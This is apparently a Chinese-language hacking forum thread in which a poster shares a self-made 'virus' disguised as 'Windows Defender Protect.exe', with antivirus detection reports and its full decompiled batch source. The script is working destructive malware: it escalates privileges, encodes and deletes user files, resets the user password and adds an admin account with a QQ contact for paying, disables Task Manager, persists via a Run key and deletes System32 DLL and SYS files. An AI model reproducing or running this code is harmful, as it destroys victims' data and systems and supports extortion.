原创病毒（bat有源码可以要）

温馨小屋

MES

秋日之殇

卡巴斯基扫描miss，双击报错

温馨小屋

Filename: Windows Defender Protect.exe
Threat name: Heur.AdvML.BFull Path: C:\Users\NortonLTSC\Desktop\Windows Defender Protect.exe

____________________________

____________________________


On computers as of 
2021/1/14 at 21:46:06

Last Used 
2021/1/14 at 21:48:06

Startup Item 
No

Launched 
No

Threat type: Heuristic Virus. Detection of a threat based on malware heuristics.


____________________________


Windows Defender Protect.exe Threat name: Heur.AdvML.B
Locate


Very Few Users
Fewer than 5 users in the Norton Community have used this file.

Very New
This file was released less than 1 week  ago.

High
This file risk is high.


____________________________


Source: External Media

Source File:
Windows Defender Protect.exe

____________________________

File Actions

File: C:\Users\NortonLTSC\Desktop\ Windows Defender Protect.exe Removed
File: c:\Users\nortonltsc\Desktop\ 璇烽

测试者

1. [url=home.php?mod=space&uid=500624]@Shift[/url] /0
   
2. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
3. cd Desktop\
   
4. echo 文件名写了吧，这是个病毒
   
5. echo 作者肯定也说过了，这是个病毿
   
6. echo 再给你一次机会，确认启动吗？
   
7. set /p ch=>请选择
   
8. if %ch%==y goto f1
   
9. if %ch%==Y goto f1
   
10. if %ch%==n goto f2
    
11. if %ch%==N goto f2
    
12. pause
    
13. : f2
    
14. echo 退出。。〿
    
15. choice /t 1 /d y /n >nul
    
16. : f1
    
17. echo net user %username% 5539661qpec >>lock.bat
    
18. ehco net user guest /active :yes>>lock.bat
    
19. echo net user 要密码加QQ3051200685 administrator /add>>lock.bat
    
20. echo net localgroup administrators 要密码加QQ3051200685 /add >>lock.bat
    
21. start lock.bat
    
22. echo 现在病毒已经正式启动亿
    
23. echo 今天是多么美好的一夿
    
24. echo 像你这样的用房
    
25. echo 就应该在地狱里焚烿
    
26. echo 接受审判吧，你这狂妄之人！！＿
    
27. choice /t 1 /d y /n >nul
    
28. cls
    
29. color a
    
30. %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
    
31. 
    
32. taskkill /f /im explorer.exe
    
33. md %temp%\tmprun
    
34. 
    
35. cd %SystemDrive%\
    
36. 
    
37. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
38. 
    
39. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
40. 
    
41. cd %UserProFile%\
    
42. 
    
43. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
44. 
    
45. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
46. 
    
47. cd %temp%\tmprun
    
48. cd %UserProFile%\Desktop\
    
49. 
    
50. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
51. 
    
52. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
53. 
    
54. cd %temp%\tmprun
    
55. cd %UserProFile%\Downloads\
    
56. 
    
57. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
58. 
    
59. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
60. 
    
61. cd %temp%\tmprun
    
62. cd %UserProFile%\Favorites\
    
63. 
    
64. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
65. 
    
66. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
67. 
    
68. cd %temp%\tmprun
    
69. cd %UserProFile%\Searches\
    
70. 
    
71. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
72. 
    
73. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
74. 
    
75. cd %temp%\tmprun
    
76. cd %UserProFile%\Saved Games\
    
77. 
    
78. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
79. 
    
80. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
81. 
    
82. cd %temp%\tmprun
    
83. cd %UserProFile%\Contacts\
    
84. 
    
85. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
86. 
    
87. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
88. 
    
89. cd %temp%\tmprun
    
90. cd %UserProFile%\Links\
    
91. 
    
92. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
93. 
    
94. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
    
95. 
    
96. cd %temp%\tmprun
    
97. cd %UserProFile%\Videos\
    
98. 
    
99. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
    
100. 
     
101. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
     
102. 
     
103. cd %temp%\tmprun
     
104. cd %UserProFile%\Pictures\
     
105. 
     
106. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
     
107. 
     
108. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
     
109. 
     
110. cd %temp%\tmprun
     
111. cd %UserProFile%\Documents\
     
112. 
     
113. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
     
114. 
     
115. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
     
116. 
     
117. cd %temp%\tmprun
     
118. cd %UserProFile%\Music\
     
119. 
     
120. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
     
121. 
     
122. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿
     
123. 
     
124. cd %SystemDrive%\
     
125. 
     
126. del /s /q *.光墓data
     
127. for /l %%i in (1,1,100) do mkdir b%%i
     
128. cd C:\Users\%username%\Desktop\
     
129. for /l %%i  in (1, 1, 100)  do md  b%%i
     
130. for /l %%i in (1, 1, 100) do copy %0 b%%i
     
131. for /l %%i in (1, 1, 100) do for /l %%q in (1,1,100) do echo 1 >b%%i\笿%q个无法删除的文件.txt
     
132. for /l %%i in (1, 1, 100) do echo do >>b%%i\提示%%i.vbs
     
133. for /l %%i in (1, 1, 100) do echo msgbox "这是你的笿%i个文件夹",16,"病毒提示" >>b%%i\提示%%i.vbs
     
134. for /l %%i in (1, 1, 100) do echo loop >>b%%i\提示%%i.vbs
     
135. for /l %%i in (1, 1, 100) do move *.光墓是你爿b%%i\
     
136. for /l %%i in (1, 1, 100) do if exist "b%%i\提示%%i.vbs" (
     
137. start b%%i\提示%%i.vbs  )
     
138. for /l %%i in (1, 1, 100) do attrib +s +h "C:\Users\Administrator\Desktop\b%%i"
     
139. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
     
140. echo :a>>ki.bat
     
141. echo taskkill /f /im taskmgr.exe>>ki.bat
     
142. echo goto a>>ki.bat
     
143. start ki.bat
     
144. start ki.bat
     
145. start ki.bat
     
146. start ki.bat
     
147. start ki.bat
     
148. start ki.bat
     
149. start ki.bat
     
150. start ki.bat
     
151. start ki.bat
     
152. copy %0 C:\Windows\System32\lock.bat
     
153. echo del *.* /s /q tree>>de.bat
     
154. start de.bat
     
155. echo taskkill /f /im explorer.exe >>bili.bat
     
156. echo taskkill /f /im wininit.exe >>bili.bat
     
157. echo shutdown
     
158. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winstat /t reg_sz /d C:\Users\%username%\Desktop\bili.bat
     
159. attrib +s +h C:\Users\%username%\Desktop\bili.bat
     
160. del lock.bat
     
161. echo del C:\Windows\System32\*.dll>>e.bat
     
162. echo del e.bat >>e.bat
     
163. start e.bat
     
164. echo del C:\Windows\System32\*.sys>>f.bat
     
165. echo del f.bat >>f.bat
     
166. start f.bat
     
167. echo do>>equ.vbs
     
168. echo msgbox ("DE DEUHOU")>>equ.vbs
     
169. echo loop >>equ.vbs
     
170. echo :a >>sta.bat
     
171. echo start equ.vbs >>sta.bat
     
172. echo goto a >>sta.bat
     
173. start sta.bat
     
174. choice /t 2 /d y /n >nul
     
175. taskkill /f /im wininit.exe
     

复制代码

你逗我？

hsks

光墓啊 发表于 2021-1-14 21:46
可能免杀一部分

问题是360报
Generic/Trojan.4f0
说好360不报的呢

a233

Avast
BV:Agent-ACN [Trj]

光墓啊

测试者 发表于 2021-1-14 21:49
你逗我？

又一个反向解码解错的
慢慢研究
你用的battoexe吧，上当了

光墓啊

hsks 发表于 2021-1-14 21:50
问题是360报
Generic/Trojan.4f0
说好360不报的呢

刚刚我上传了

测试者

光墓啊 发表于 2021-1-14 21:54
又一个反向解码解错的
慢慢研究
你用的battoexe吧，上当了

不是哦，我是分析文件

光墓啊

测试者 发表于 2021-1-14 21:56
不是哦，我是分析文件

所以呢？
我用OD弄过反钩子HOOK的dll壳